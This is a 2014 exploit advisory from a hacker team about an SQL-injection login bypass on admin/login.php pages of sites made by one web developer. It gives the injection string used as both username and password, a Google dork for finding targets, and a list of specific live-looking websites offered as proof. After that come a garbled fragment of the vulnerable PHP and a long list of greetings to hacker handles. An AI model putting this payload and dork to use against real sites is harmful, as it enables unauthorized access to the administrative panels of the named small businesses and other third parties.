######################################### # Exploit Title : Developed by Madss Software Solution Login page Bypass Vulnerability # # Exploit Author : Ashiyane Digital Security Team # # Vendor Homepage : http://madsssoftwaresolution.com # # Tested on: Windows 7 , Linux # # Google Dork : intext:"Developed by Madss Software Solution Pvt. Ltd." # # Date: 2014/4/13 # ########################################### # # Exploit : Login page bypass # # Location : [Target]/admin/login.php # # Username : '=' 'or' # # Password : '=' 'or' ###################### # Proof: # # http://www.artistmahendradubey.com/admin/login.php # # http://www.sardarenterprises.com/admin/login.php # # http://www.amritaorganic.com/admin/login.php # # http://www.kvmcpandhana.com/admin/login.php # # http://www.vikatsoft.com/admin/login.php # # http://www.narulamathsmagic.com/admin/login.php # # http://www.dayodayathirthborgaon.com/admin/login.php # # http://www.chhatimata.com/admin/login.php # # http://www.chhatimata.com/admin/login.php # # http://www.mnlawcollegekhandwa.com/admin/login.php # # http://www.guptashrikhandwa.com/admin/login.php # # http://www.apnagwalior.com/admin/login.php # # http://www.apnamorena.com/admin/login.php # # http://www.djpsbhikangaon.com/admin/login.php # # http://www.acmecoachingbhikangaon.com/admin/login.php # # http://www.sainisportsacademy.com/admin/login.php # # http://www.apnaburhanpur.com/admin/login.php # ############################################ Vulnerable Code Admin Login
Logout completelly

Administrator

0) { $_SESSION["session_nickname"]=$_POST['username']; $_SESSION["type"]='admin'; ?>

################################################### Milad Hacking We Love Mohammad Home Page : https://www.facebook.com/milad.hacking.5 Email: milad.hacking.blackhat[at]gmail.com Parcham balast ############################################ Special Tnx To My Love , Iliya Norton , Unfix Blackhat , HashoR , Unline , mahdi.safavi , h00man_empire Bahman Spy , Far Yar , Parsix , Matthew Farrell , ALi Sec , Ali Svr , Hossein Ghayoumi Zadeh , Shahram BlackHat , Saeed Nouri Massal , Hamid Reza Ashrafnia , LinX64 , Hossein Hezami , Raminramz ,Ali Reza , Saeed.0511 , Spoofer ( best Friend ) , Dr4GOn ,Alireza666 , Amirh03in , Rezahck23 , EB051 , AbolfazlKHAAN , Hacker.Ramin , b0z0rgmehr , badguy , Nc 521 , Alireza Attacker , HAMIDx9 , GNU Linux , BlackhatGH , Angel--D3m0n , B14ckc0d3r , Milad-Bushehr , F.I.G.H.T.E.R , SHD.N3T , SaiedSoft , Cyb3r_Inj3ct0r , SolD!3r , ACC3SS , Wanted2011 , CyberHacker , Hasan Speed , iman teymouri , Ba3bak , spoof , T3rm!nat0r5 , D3s!6n37 , @_HOJ@T_@ , 4rm4n , Th� mAnger , FaridP30 , AMoK , Azad� , The-Smith , soheil-hidd3n , blackvirus73 ,ERroR , HASSAN20 , Majidflash , R33VES� , Rz04 , stealer , Dr.James , m@rte2a , Mast3r 0mid , MMA Defacer , MR.Moein , Mr.PERSIA , Red line ############################################ Never Forget My Top Friends <3 ############################################